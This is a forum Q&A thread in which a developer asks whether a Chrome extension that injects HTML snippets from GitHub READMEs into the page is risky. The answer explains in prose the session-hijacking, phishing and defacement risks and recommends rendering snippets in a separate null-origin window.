Is there malicous HTML?



  • I'm writing a chrome extension that evaluates certain code blocks from GitHub pages, e.g.,

    Lorem ipsum
    ```html-embed
    <iframe></iframe>
    

    dolor site amet.

    
    <p>and adds their content as HTML to the page. Is this potentially dangerous, i.e., is there malicious HTML?</p>


  • Yeah, that seems like a bad idea.

    Basically, what is HTML/javascript? It's someone else's code running on your computer through some fancy interpreter / sandbox thing that we call "a browser".

    I generally trust github.com to serve me non-malicious code, especially since browsers put a lot of effort into sandboxing websites so that html/js from github.com can only affect my interactions with github.com. Do I trust GitHub's web devs not to do funny business with my github account and password? Yeah, I think I have to, I don't think I have a choice there.

    If I'm understanding your extension idea correctly, you are taking HTML snippets provided by the author of the github repo you're looking at (which could be anyone, usually not a GitHub employee) and injecting that into the page so that your browser's security engine thinks that code came from github.com? Just because I'm reading the readme in some github repo does not mean I want the author of that readme to be logged into github as me!


    Here's some ideas of malicious code snippets that could take control of your github session, or otherwise abuse the browser / user's trust that the page they are seeing came from github.com.

    1. Website defacement; maybe replace some of the default github links with links to an attacker-controlled site.
    2. Javascript
      <script>
      

      tags that, since they are running inside the github.com origin in a logged-in session, can perform any action in the victim's github account, including changing the password or giving themself ownership of the account.

    3. Even if you block script tags, the github UI uses lots of open source javascript libs, and those have CVEs in them from time to time; I've seen a lot of CVEs that are benign unless the UI is rendering maliciously-crafted HTML (which the github UI wasn't until your extension came along .. so you're changing (weakening) the security model of the github.com UI).
    4. The custom HTML makes a login page that looks identical to the real github.com login page, but POSTs the victim's username / password / MFA to a site the attacker controls.
    5. etc

    Fundamentally these are problems because you're rendering this into the existing page and making it look to the browser like this HTML was served by the legitimate site, and therefore knee-caps the browser's ability to enforce security controls.

    I would suggest instead that your extension put a Render this button over the HTML snippet that pops it open in a new window with a null domain / origin.



Suggested Topics

  • 2
  • 2
  • 2
  • 2
  • 2
  • 2
  • 2
  • 2